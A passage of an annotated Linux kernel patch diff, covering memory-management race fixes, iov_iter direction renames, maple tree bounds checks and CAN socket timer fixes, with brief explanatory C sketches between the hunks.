+ 		work->sig = sig;
+ 		work->type = type;
+ 		irq_work_queue(&work->irq_work);
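
The bpf_trace fix is a classic deferred-work lifetime pattern: the irq_work handler runs after the helper returns, so the task reference must be pinned when the work is queued and dropped in the handler, or the task could be freed underneath group_send_sig_info(). A sketch with plain counters standing in for task refcounts:

    #include <stdio.h>

    struct task { int usage; };

    static struct task *get_task_struct(struct task *t) { t->usage++; return t; }
    static void put_task_struct(struct task *t)         { t->usage--; }

    struct work { struct task *task; };

    static void do_send_signal(struct work *w)  /* runs later, maybe post-exit */
    {
        /* ... deliver the signal to w->task ... */
        put_task_struct(w->task);               /* new: release the pin */
    }

    int main(void)
    {
        struct task current = { 1 };
        struct work w;

        w.task = get_task_struct(&current);     /* new: pin before queueing */
        /* the task could exit here; the pin keeps the struct alive */
        do_send_signal(&w);
        printf("usage back to %d\n", current.usage);  /* 1 */
        return 0;
    }
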
+diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
+index 9cb53182bb31c..908e8a13c675b 100644
+--- a/kernel/trace/trace_events_user.c
++++ b/kernel/trace/trace_events_user.c
+@@ -1489,7 +1489,7 @@ static ssize_t user_events_write(struct file *file, const char __user *ubuf,
+ 	if (unlikely(*ppos != 0))
+ 		return -EFAULT;
+ 
+-	if (unlikely(import_single_range(WRITE, (char __user *)ubuf,
++	if (unlikely(import_single_range(ITER_SOURCE, (char __user *)ubuf,
+ 					 count, &iov, &i)))
+ 		return -EFAULT;
+ 
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index fe21bf276d91c..69cb44b035ec1 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -665,12 +665,13 @@ static inline unsigned long mte_pivot(const struct maple_enode *mn,
+ 				 unsigned char piv)
+ {
+ 	struct maple_node *node = mte_to_node(mn);
++	enum maple_type type = mte_node_type(mn);
+ 
+-	if (piv >= mt_pivots[piv]) {
++	if (piv >= mt_pivots[type]) {
+ 		WARN_ON(1);
+ 		return 0;
+ 	}
+-	switch (mte_node_type(mn)) {
++	switch (type) {
+ 	case maple_arange_64:
+ 		return node->ma64.pivot[piv];
+ 	case maple_range_64:
+@@ -4882,7 +4883,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 	unsigned long *pivots, *gaps;
+ 	void __rcu **slots;
+ 	unsigned long gap = 0;
+-	unsigned long max, min, index;
++	unsigned long max, min;
+ 	unsigned char offset;
+ 
+ 	if (unlikely(mas_is_err(mas)))
+@@ -4904,8 +4905,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 		min = mas_safe_min(mas, pivots, --offset);
+ 
+ 	max = mas_safe_pivot(mas, pivots, offset, type);
+-	index = mas->index;
+-	while (index <= max) {
++	while (mas->index <= max) {
+ 		gap = 0;
+ 		if (gaps)
+ 			gap = gaps[offset];
+@@ -4936,10 +4936,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 		min = mas_safe_min(mas, pivots, offset);
+ 	}
+ 
+-	if (unlikely(index > max)) {
+-		mas_set_err(mas, -EBUSY);
+-		return false;
+-	}
++	if (unlikely((mas->index > max) || (size - 1 > max - mas->index)))
++		goto no_space;
+ 
+ 	if (unlikely(ma_is_leaf(type))) {
+ 		mas->offset = offset;
+@@ -4956,9 +4954,11 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 	return false;
+ 
+ ascend:
+-	if (mte_is_root(mas->node))
+-		mas_set_err(mas, -EBUSY);
++	if (!mte_is_root(mas->node))
++		return false;
+ 
++no_space:
++	mas_set_err(mas, -EBUSY);
+ 	return false;
+ }
+ 
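
The key addition in mas_rev_awalk() is the window check `size - 1 > max - mas->index`: the naive form `index + size - 1 > max` can wrap around on large indexes, so the subtraction is done on the side that cannot overflow. A sketch of the wrap-safe test (the real function also walks node gaps; size >= 1 is assumed, as allocation requests are never zero-sized):

    #include <stdbool.h>
    #include <stdio.h>

    static bool fits(unsigned long index, unsigned long max, unsigned long size)
    {
        /* equivalent to index + size - 1 <= max, without wraparound */
        return index <= max && size - 1 <= max - index;
    }

    int main(void)
    {
        printf("%d\n", fits(5, 9, 5));            /* 1: [5,9] holds 5 slots */
        printf("%d\n", fits(6, 9, 5));            /* 0: only 4 slots remain */
        printf("%d\n", fits(~0UL - 1, ~0UL, 16)); /* 0: naive form would wrap */
        return 0;
    }
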
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index 497fc93ccf9ec..ec847bf4dcb4d 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -2517,6 +2517,91 @@ static noinline void check_bnode_min_spanning(struct maple_tree *mt)
+ 	mt_set_non_kernel(0);
+ }
+ 
++static noinline void check_empty_area_window(struct maple_tree *mt)
++{
++	unsigned long i, nr_entries = 20;
++	MA_STATE(mas, mt, 0, 0);
++
++	for (i = 1; i <= nr_entries; i++)
++		mtree_store_range(mt, i*10, i*10 + 9,
++				  xa_mk_value(i), GFP_KERNEL);
++
++	/* Create another hole besides the one at 0 */
++	mtree_store_range(mt, 160, 169, NULL, GFP_KERNEL);
++
++	/* Check lower bounds that don't fit */
++	rcu_read_lock();
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 5, 90, 10) != -EBUSY);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 6, 90, 5) != -EBUSY);
++
++	/* Check lower bound that does fit */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 5, 90, 5) != 0);
++	MT_BUG_ON(mt, mas.index != 5);
++	MT_BUG_ON(mt, mas.last != 9);
++	rcu_read_unlock();
++
++	/* Check one gap that doesn't fit and one that does */
++	rcu_read_lock();
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 5, 217, 9) != 0);
++	MT_BUG_ON(mt, mas.index != 161);
++	MT_BUG_ON(mt, mas.last != 169);
++
++	/* Check one gap that does fit above the min */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 100, 218, 3) != 0);
++	MT_BUG_ON(mt, mas.index != 216);
++	MT_BUG_ON(mt, mas.last != 218);
++
++	/* Check size that doesn't fit any gap */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 100, 218, 16) != -EBUSY);
++
++	/*
++	 * Check size that doesn't fit the lower end of the window but
++	 * does fit the gap
++	 */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 167, 200, 4) != -EBUSY);
++
++	/*
++	 * Check size that doesn't fit the upper end of the window but
++	 * does fit the gap
++	 */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 100, 162, 4) != -EBUSY);
++
++	/* Check mas_empty_area forward */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, 100, 9) != 0);
++	MT_BUG_ON(mt, mas.index != 0);
++	MT_BUG_ON(mt, mas.last != 8);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, 100, 4) != 0);
++	MT_BUG_ON(mt, mas.index != 0);
++	MT_BUG_ON(mt, mas.last != 3);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, 100, 11) != -EBUSY);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 5, 100, 6) != -EBUSY);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, 8, 10) != -EBUSY);
++
++	mas_reset(&mas);
++	mas_empty_area(&mas, 100, 165, 3);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 100, 163, 6) != -EBUSY);
++	rcu_read_unlock();
++}
++
+ static DEFINE_MTREE(tree);
+ static int maple_tree_seed(void)
+ {
+@@ -2765,6 +2850,10 @@ static int maple_tree_seed(void)
+ 	check_bnode_min_spanning(&tree);
+ 	mtree_destroy(&tree);
+ 
++	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
++	check_empty_area_window(&tree);
++	mtree_destroy(&tree);
++
+ #if defined(BENCH)
+ skip:
+ #endif
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index c982b250aa317..e0c7bbd69b33e 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -847,6 +847,10 @@ static int hugepage_vma_revalidate(struct mm_struct *mm, unsigned long address,
+ 	return SCAN_SUCCEED;
+ }
+ 
++/*
++ * See pmd_trans_unstable() for how the result may change out from
++ * underneath us, even if we hold mmap_lock in read.
++ */
+ static int find_pmd_or_thp_or_none(struct mm_struct *mm,
+ 				   unsigned long address,
+ 				   pmd_t **pmd)
+@@ -865,8 +869,12 @@ static int find_pmd_or_thp_or_none(struct mm_struct *mm,
+ #endif
+ 	if (pmd_none(pmde))
+ 		return SCAN_PMD_NONE;
++	if (!pmd_present(pmde))
++		return SCAN_PMD_NULL;
+ 	if (pmd_trans_huge(pmde))
+ 		return SCAN_PMD_MAPPED;
++	if (pmd_devmap(pmde))
++		return SCAN_PMD_NULL;
+ 	if (pmd_bad(pmde))
+ 		return SCAN_PMD_NULL;
+ 	return SCAN_SUCCEED;
+@@ -1649,7 +1657,7 @@ static int retract_page_tables(struct address_space *mapping, pgoff_t pgoff,
+ 		 * has higher cost too. It would also probably require locking
+ 		 * the anon_vma.
+ 		 */
+-		if (vma->anon_vma) {
++		if (READ_ONCE(vma->anon_vma)) {
+ 			result = SCAN_PAGE_ANON;
+ 			goto next;
+ 		}
+@@ -1677,6 +1685,18 @@ static int retract_page_tables(struct address_space *mapping, pgoff_t pgoff,
+ 		result = SCAN_PTE_MAPPED_HUGEPAGE;
+ 		if ((cc->is_khugepaged || is_target) &&
+ 		    mmap_write_trylock(mm)) {
++			/*
++			 * Re-check whether we have an ->anon_vma, because
++			 * collapse_and_free_pmd() requires that either no
++			 * ->anon_vma exists or the anon_vma is locked.
++			 * We already checked ->anon_vma above, but that check
++			 * is racy because ->anon_vma can be populated under the
++			 * mmap lock in read mode.
++			 */
++			if (vma->anon_vma) {
++				result = SCAN_PAGE_ANON;
++				goto unlock_next;
++			}
+ 			/*
+ 			 * When a vma is registered with uffd-wp, we can't
+ 			 * recycle the pmd pgtable because there can be pte
+diff --git a/mm/madvise.c b/mm/madvise.c
+index b913ba6efc10b..d03e149ffe6e8 100644
+--- a/mm/madvise.c
++++ b/mm/madvise.c
+@@ -1459,7 +1459,7 @@ SYSCALL_DEFINE5(process_madvise, int, pidfd, const struct iovec __user *, vec,
+ 		goto out;
+ 	}
+ 
+-	ret = import_iovec(READ, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
++	ret = import_iovec(ITER_DEST, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
+ 	if (ret < 0)
+ 		goto out;
+ 
+diff --git a/mm/memory.c b/mm/memory.c
+index 8c8420934d603..f6f93e5b6b023 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -875,12 +875,8 @@ copy_nonpresent_pte(struct mm_struct *dst_mm, struct mm_struct *src_mm,
+ 			return -EBUSY;
+ 		return -ENOENT;
+ 	} else if (is_pte_marker_entry(entry)) {
+-		/*
+-		 * We're copying the pgtable should only because dst_vma has
+-		 * uffd-wp enabled, do sanity check.
+-		 */
+-		WARN_ON_ONCE(!userfaultfd_wp(dst_vma));
+-		set_pte_at(dst_mm, addr, dst_pte, pte);
++		if (userfaultfd_wp(dst_vma))
++			set_pte_at(dst_mm, addr, dst_pte, pte);
+ 		return 0;
+ 	}
+ 	if (!userfaultfd_wp(dst_vma))
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index 02c8a712282f1..f940395667c82 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -600,7 +600,8 @@ static int queue_pages_hugetlb(pte_t *pte, unsigned long hmask,
+ 
+ 	/* With MPOL_MF_MOVE, we migrate only unshared hugepage. */
+ 	if (flags & (MPOL_MF_MOVE_ALL) ||
+-	    (flags & MPOL_MF_MOVE && page_mapcount(page) == 1)) {
++	    (flags & MPOL_MF_MOVE && page_mapcount(page) == 1 &&
++	     !hugetlb_pmd_shared(pte))) {
+ 		if (isolate_hugetlb(page, qp->pagelist) &&
+ 			(flags & MPOL_MF_STRICT))
+ 			/*
+diff --git a/mm/mremap.c b/mm/mremap.c
+index fe587c5d65913..930f65c315c02 100644
+--- a/mm/mremap.c
++++ b/mm/mremap.c
+@@ -1027,16 +1027,29 @@ SYSCALL_DEFINE5(mremap, unsigned long, addr, unsigned long, old_len,
+ 			}
+ 
+ 			/*
+-			 * Function vma_merge() is called on the extension we are adding to
+-			 * the already existing vma, vma_merge() will merge this extension with
+-			 * the already existing vma (expand operation itself) and possibly also
+-			 * with the next vma if it becomes adjacent to the expanded vma and
+-			 * otherwise compatible.
++			 * Function vma_merge() is called on the extension we
++			 * are adding to the already existing vma, vma_merge()
++			 * will merge this extension with the already existing
++			 * vma (expand operation itself) and possibly also with
++			 * the next vma if it becomes adjacent to the expanded
++			 * vma and  otherwise compatible.
++			 *
++			 * However, vma_merge() can currently fail due to
++			 * is_mergeable_vma() check for vm_ops->close (see the
++			 * comment there). Yet this should not prevent vma
++			 * expanding, so perform a simple expand for such vma.
++			 * Ideally the check for close op should be only done
++			 * when a vma would be actually removed due to a merge.
+ 			 */
+-			vma = vma_merge(mm, vma, extension_start, extension_end,
++			if (!vma->vm_ops || !vma->vm_ops->close) {
++				vma = vma_merge(mm, vma, extension_start, extension_end,
+ 					vma->vm_flags, vma->anon_vma, vma->vm_file,
+ 					extension_pgoff, vma_policy(vma),
+ 					vma->vm_userfaultfd_ctx, anon_vma_name(vma));
++			} else if (vma_adjust(vma, vma->vm_start, addr + new_len,
++				   vma->vm_pgoff, NULL)) {
++				vma = NULL;
++			}
+ 			if (!vma) {
+ 				vm_unacct_memory(pages);
+ 				ret = -ENOMEM;
+diff --git a/mm/page_io.c b/mm/page_io.c
+index 2af34dd8fa4db..3a5f921b932e8 100644
+--- a/mm/page_io.c
++++ b/mm/page_io.c
+@@ -376,7 +376,7 @@ void swap_write_unplug(struct swap_iocb *sio)
+ 	struct address_space *mapping = sio->iocb.ki_filp->f_mapping;
+ 	int ret;
+ 
+-	iov_iter_bvec(&from, WRITE, sio->bvec, sio->pages, sio->len);
++	iov_iter_bvec(&from, ITER_SOURCE, sio->bvec, sio->pages, sio->len);
+ 	ret = mapping->a_ops->swap_rw(&sio->iocb, &from);
+ 	if (ret != -EIOCBQUEUED)
+ 		sio_write_complete(&sio->iocb, ret);
+@@ -530,7 +530,7 @@ void __swap_read_unplug(struct swap_iocb *sio)
+ 	struct address_space *mapping = sio->iocb.ki_filp->f_mapping;
+ 	int ret;
+ 
+-	iov_iter_bvec(&from, READ, sio->bvec, sio->pages, sio->len);
++	iov_iter_bvec(&from, ITER_DEST, sio->bvec, sio->pages, sio->len);
+ 	ret = mapping->a_ops->swap_rw(&sio->iocb, &from);
+ 	if (ret != -EIOCBQUEUED)
+ 		sio_read_complete(&sio->iocb, ret);
+diff --git a/mm/process_vm_access.c b/mm/process_vm_access.c
+index 4bcc119580890..78dfaf9e8990a 100644
+--- a/mm/process_vm_access.c
++++ b/mm/process_vm_access.c
+@@ -263,7 +263,7 @@ static ssize_t process_vm_rw(pid_t pid,
+ 	struct iovec *iov_r;
+ 	struct iov_iter iter;
+ 	ssize_t rc;
+-	int dir = vm_write ? WRITE : READ;
++	int dir = vm_write ? ITER_SOURCE : ITER_DEST;
+ 
+ 	if (flags != 0)
+ 		return -EINVAL;
+diff --git a/mm/swapfile.c b/mm/swapfile.c
+index 72e481aacd5df..b72908df52ac9 100644
+--- a/mm/swapfile.c
++++ b/mm/swapfile.c
+@@ -1101,6 +1101,7 @@ start_over:
+ 			goto check_out;
+ 		pr_debug("scan_swap_map of si %d failed to find offset\n",
+ 			si->type);
++		cond_resched();
+ 
+ 		spin_lock(&swap_avail_lock);
+ nextsi:
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 8fcc5fa768c07..96eb9da372cd7 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -3290,13 +3290,16 @@ void lru_gen_migrate_mm(struct mm_struct *mm)
+ 	if (mem_cgroup_disabled())
+ 		return;
+ 
++	/* migration can happen before addition */
++	if (!mm->lru_gen.memcg)
++		return;
++
+ 	rcu_read_lock();
+ 	memcg = mem_cgroup_from_task(task);
+ 	rcu_read_unlock();
+ 	if (memcg == mm->lru_gen.memcg)
+ 		return;
+ 
+-	VM_WARN_ON_ONCE(!mm->lru_gen.memcg);
+ 	VM_WARN_ON_ONCE(list_empty(&mm->lru_gen.list));
+ 
+ 	lru_gen_del_mm(mm);
+diff --git a/net/9p/client.c b/net/9p/client.c
+index b5aa25f82b78d..554a4b11f4fec 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -2049,7 +2049,7 @@ int p9_client_readdir(struct p9_fid *fid, char *data, u32 count, u64 offset)
+ 	struct kvec kv = {.iov_base = data, .iov_len = count};
+ 	struct iov_iter to;
+ 
+-	iov_iter_kvec(&to, READ, &kv, 1, count);
++	iov_iter_kvec(&to, ITER_DEST, &kv, 1, count);
+ 
+ 	p9_debug(P9_DEBUG_9P, ">>> TREADDIR fid %d offset %llu count %d\n",
+ 		 fid->fid, offset, count);
+diff --git a/net/bluetooth/6lowpan.c b/net/bluetooth/6lowpan.c
+index c57d643afb108..4eb1b3ced0d27 100644
+--- a/net/bluetooth/6lowpan.c
++++ b/net/bluetooth/6lowpan.c
+@@ -441,7 +441,7 @@ static int send_pkt(struct l2cap_chan *chan, struct sk_buff *skb,
+ 	iv.iov_len = skb->len;
+ 
+ 	memset(&msg, 0, sizeof(msg));
+-	iov_iter_kvec(&msg.msg_iter, WRITE, &iv, 1, skb->len);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, &iv, 1, skb->len);
+ 
+ 	err = l2cap_chan_send(chan, &msg, skb->len);
+ 	if (err > 0) {
+diff --git a/net/bluetooth/a2mp.c b/net/bluetooth/a2mp.c
+index 1fcc482397c36..e7adb8a98cf90 100644
+--- a/net/bluetooth/a2mp.c
++++ b/net/bluetooth/a2mp.c
+@@ -56,7 +56,7 @@ static void a2mp_send(struct amp_mgr *mgr, u8 code, u8 ident, u16 len, void *dat
+ 
+ 	memset(&msg, 0, sizeof(msg));
+ 
+-	iov_iter_kvec(&msg.msg_iter, WRITE, &iv, 1, total_len);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, &iv, 1, total_len);
+ 
+ 	l2cap_chan_send(chan, &msg, total_len);
+ 
+diff --git a/net/bluetooth/smp.c b/net/bluetooth/smp.c
+index 11f853d0500ff..70663229b3cc9 100644
+--- a/net/bluetooth/smp.c
++++ b/net/bluetooth/smp.c
+@@ -605,7 +605,7 @@ static void smp_send_cmd(struct l2cap_conn *conn, u8 code, u16 len, void *data)
+ 
+ 	memset(&msg, 0, sizeof(msg));
+ 
+-	iov_iter_kvec(&msg.msg_iter, WRITE, iv, 2, 1 + len);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, iv, 2, 1 + len);
+ 
+ 	l2cap_chan_send(chan, &msg, 1 + len);
+ 
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index f20f4373ff408..9554abcfd5b4e 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -871,6 +871,7 @@ static unsigned int ip_sabotage_in(void *priv,
+ 	if (nf_bridge && !nf_bridge->in_prerouting &&
+ 	    !netif_is_l3_master(skb->dev) &&
+ 	    !netif_is_l3_slave(skb->dev)) {
++		nf_bridge_info_free(skb);
+ 		state->okfn(state->net, state->sk, skb);
+ 		return NF_STOLEN;
+ 	}
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 608f8c24ae46b..fc81d77724a13 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -140,7 +140,7 @@ struct isotp_sock {
+ 	canid_t rxid;
+ 	ktime_t tx_gap;
+ 	ktime_t lastrxcf_tstamp;
+-	struct hrtimer rxtimer, txtimer;
++	struct hrtimer rxtimer, txtimer, txfrtimer;
+ 	struct can_isotp_options opt;
+ 	struct can_isotp_fc_options rxfc, txfc;
+ 	struct can_isotp_ll_options ll;
+@@ -871,7 +871,7 @@ static void isotp_rcv_echo(struct sk_buff *skb, void *data)
+ 	}
+ 
+ 	/* start timer to send next consecutive frame with correct delay */
+-	hrtimer_start(&so->txtimer, so->tx_gap, HRTIMER_MODE_REL_SOFT);
++	hrtimer_start(&so->txfrtimer, so->tx_gap, HRTIMER_MODE_REL_SOFT);
+ }
+ 
+ static enum hrtimer_restart isotp_tx_timer_handler(struct hrtimer *hrtimer)
+@@ -879,49 +879,39 @@ static enum hrtimer_restart isotp_tx_timer_handler(struct hrtimer *hrtimer)
+ 	struct isotp_sock *so = container_of(hrtimer, struct isotp_sock,
+ 					     txtimer);
+ 	struct sock *sk = &so->sk;
+-	enum hrtimer_restart restart = HRTIMER_NORESTART;
+ 
+-	switch (so->tx.state) {
+-	case ISOTP_SENDING:
+-
+-		/* cfecho should be consumed by isotp_rcv_echo() here */
+-		if (!so->cfecho) {
+-			/* start timeout for unlikely lost echo skb */
+-			hrtimer_set_expires(&so->txtimer,
+-					    ktime_add(ktime_get(),
+-						      ktime_set(ISOTP_ECHO_TIMEOUT, 0)));
+-			restart = HRTIMER_RESTART;
++	/* don't handle timeouts in IDLE state */
++	if (so->tx.state == ISOTP_IDLE)
++		return HRTIMER_NORESTART;
+ 
+-			/* push out the next consecutive frame */
+-			isotp_send_cframe(so);
+-			break;
+-		}
++	/* we did not get any flow control or echo frame in time */
+ 
+-		/* cfecho has not been cleared in isotp_rcv_echo() */
+-		pr_notice_once("can-isotp: cfecho %08X timeout\n", so->cfecho);
+-		fallthrough;
++	/* report 'communication error on send' */
++	sk->sk_err = ECOMM;
++	if (!sock_flag(sk, SOCK_DEAD))
++		sk_error_report(sk);
+ 
+-	case ISOTP_WAIT_FC:
+-	case ISOTP_WAIT_FIRST_FC:
++	/* reset tx state */
++	so->tx.state = ISOTP_IDLE;
++	wake_up_interruptible(&so->wait);
+ 
+-		/* we did not get any flow control frame in time */
++	return HRTIMER_NORESTART;
++}
+ 
+-		/* report 'communication error on send' */
+-		sk->sk_err = ECOMM;
+-		if (!sock_flag(sk, SOCK_DEAD))
+-			sk_error_report(sk);
++static enum hrtimer_restart isotp_txfr_timer_handler(struct hrtimer *hrtimer)
++{
++	struct isotp_sock *so = container_of(hrtimer, struct isotp_sock,
++					     txfrtimer);
+ 
+-		/* reset tx state */
+-		so->tx.state = ISOTP_IDLE;
+-		wake_up_interruptible(&so->wait);
+-		break;
++	/* start echo timeout handling and cover below protocol error */
++	hrtimer_start(&so->txtimer, ktime_set(ISOTP_ECHO_TIMEOUT, 0),
++		      HRTIMER_MODE_REL_SOFT);
+ 
+-	default:
+-		WARN_ONCE(1, "can-isotp: tx timer state %08X cfecho %08X\n",
+-			  so->tx.state, so->cfecho);
+-	}
++	/* cfecho should be consumed by isotp_rcv_echo() here */
++	if (so->tx.state == ISOTP_SENDING && !so->cfecho)
++		isotp_send_cframe(so);
+ 
+-	return restart;
++	return HRTIMER_NORESTART;
+ }
+ 
+ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+@@ -1162,6 +1152,10 @@ static int isotp_release(struct socket *sock)
+ 	/* wait for complete transmission of current pdu */
+ 	wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
+ 
++	/* force state machines to be idle also when a signal occurred */
++	so->tx.state = ISOTP_IDLE;
++	so->rx.state = ISOTP_IDLE;
++
+ 	spin_lock(&isotp_notifier_lock);
+ 	while (isotp_busy_notifier == so) {
+ 		spin_unlock(&isotp_notifier_lock);
+@@ -1194,6 +1188,7 @@ static int isotp_release(struct socket *sock)
+ 		}
+ 	}
+ 
++	hrtimer_cancel(&so->txfrtimer);
+ 	hrtimer_cancel(&so->txtimer);
+ 	hrtimer_cancel(&so->rxtimer);
+ 
+@@ -1597,6 +1592,8 @@ static int isotp_init(struct sock *sk)
+ 	so->rxtimer.function = isotp_rx_timer_handler;
+ 	hrtimer_init(&so->txtimer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_SOFT);
+ 	so->txtimer.function = isotp_tx_timer_handler;
++	hrtimer_init(&so->txfrtimer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_SOFT);
++	so->txfrtimer.function = isotp_txfr_timer_handler;
+ 
+ 	init_waitqueue_head(&so->wait);
+ 	spin_lock_init(&so->rx_lock);
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index 55f29c9f9e08e..4177e96170703 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -1092,10 +1092,6 @@ static bool j1939_session_deactivate(struct j1939_session *session)
+ 	bool active;
+ 
+ 	j1939_session_list_lock(priv);
+-	/* This function should be called with a session ref-count of at
+-	 * least 2.
+-	 */
+-	WARN_ON_ONCE(kref_read(&session->kref) < 2);
+ 	active = j1939_session_deactivate_locked(session);
+ 	j1939_session_list_unlock(priv);
+ 
+diff --git a/net/can/raw.c b/net/can/raw.c
+index 3eb7d3e2b541f..4abab2c3011a3 100644
+--- a/net/can/raw.c
++++ b/net/can/raw.c
+@@ -132,8 +132,8 @@ static void raw_rcv(struct sk_buff *oskb, void *data)
+ 		return;
+ 
+ 	/* make sure to not pass oversized frames to the socket */
+-	if ((can_is_canfd_skb(oskb) && !ro->fd_frames && !ro->xl_frames) ||
+-	    (can_is_canxl_skb(oskb) && !ro->xl_frames))
++	if ((!ro->fd_frames && can_is_canfd_skb(oskb)) ||
++	    (!ro->xl_frames && can_is_canxl_skb(oskb)))
+ 		return;
+ 
+ 	/* eliminate multiple filter matches for the same skb */
+@@ -670,6 +670,11 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		if (copy_from_sockptr(&ro->fd_frames, optval, optlen))
+ 			return -EFAULT;
+ 
++		/* Enabling CAN XL includes CAN FD */
++		if (ro->xl_frames && !ro->fd_frames) {
++			ro->fd_frames = ro->xl_frames;
++			return -EINVAL;
++		}
+ 		break;
+ 
+ 	case CAN_RAW_XL_FRAMES:
+@@ -679,6 +684,9 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		if (copy_from_sockptr(&ro->xl_frames, optval, optlen))
+ 			return -EFAULT;
+ 
++		/* Enabling CAN XL includes CAN FD */
++		if (ro->xl_frames)
++			ro->fd_frames = ro->xl_frames;
+ 		break;
+ 
+ 	case CAN_RAW_JOIN_FILTERS:
+@@ -786,6 +794,25 @@ static int raw_getsockopt(struct socket *sock, int level, int optname,
+ 	return 0;
+ }
+ 
++static bool raw_bad_txframe(struct raw_sock *ro, struct sk_buff *skb, int mtu)
++{
++	/* Classical CAN -> no checks for flags and device capabilities */
++	if (can_is_can_skb(skb))
++		return false;
++
++	/* CAN FD -> needs to be enabled and a CAN FD or CAN XL device */
++	if (ro->fd_frames && can_is_canfd_skb(skb) &&
++	    (mtu == CANFD_MTU || can_is_canxl_dev_mtu(mtu)))
++		return false;
++
++	/* CAN XL -> needs to be enabled and a CAN XL device */
++	if (ro->xl_frames && can_is_canxl_skb(skb) &&
++	    can_is_canxl_dev_mtu(mtu))
++		return false;
++
++	return true;
++}
++
+ static int raw_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ {
+ 	struct sock *sk = sock->sk;
+@@ -833,20 +860,8 @@ static int raw_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 		goto free_skb;
+ 
+ 	err = -EINVAL;
+-	if (ro->xl_frames && can_is_canxl_dev_mtu(dev->mtu)) {
+-		/* CAN XL, CAN FD and Classical CAN */
+-		if (!can_is_canxl_skb(skb) && !can_is_canfd_skb(skb) &&
+-		    !can_is_can_skb(skb))
+-			goto free_skb;
+-	} else if (ro->fd_frames && dev->mtu == CANFD_MTU) {
+-		/* CAN FD and Classical CAN */
+-		if (!can_is_canfd_skb(skb) && !can_is_can_skb(skb))
+-			goto free_skb;
+-	} else {
+-		/* Classical CAN */
+-		if (!can_is_can_skb(skb))
+-			goto free_skb;
+-	}
++	if (raw_bad_txframe(ro, skb, dev->mtu))
++		goto free_skb;
+ 
+ 	sockcm_init(&sockc, sk);
+ 	if (msg->msg_controllen) {
+diff --git a/net/ceph/messenger_v1.c b/net/ceph/messenger_v1.c
+index 3ddbde87e4d6e..d1787d7d33ef9 100644
+--- a/net/ceph/messenger_v1.c
++++ b/net/ceph/messenger_v1.c
+@@ -30,7 +30,7 @@ static int ceph_tcp_recvmsg(struct socket *sock, void *buf, size_t len)
+ 	if (!buf)
+ 		msg.msg_flags |= MSG_TRUNC;
+ 
+-	iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, len);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, len);
+ 	r = sock_recvmsg(sock, &msg, msg.msg_flags);
+ 	if (r == -EAGAIN)
+ 		r = 0;
+@@ -49,7 +49,7 @@ static int ceph_tcp_recvpage(struct socket *sock, struct page *page,
+ 	int r;
+ 
+ 	BUG_ON(page_offset + length > PAGE_SIZE);
+-	iov_iter_bvec(&msg.msg_iter, READ, &bvec, 1, length);
++	iov_iter_bvec(&msg.msg_iter, ITER_DEST, &bvec, 1, length);
+ 	r = sock_recvmsg(sock, &msg, msg.msg_flags);
+ 	if (r == -EAGAIN)
+ 		r = 0;
+diff --git a/net/ceph/messenger_v2.c b/net/ceph/messenger_v2.c
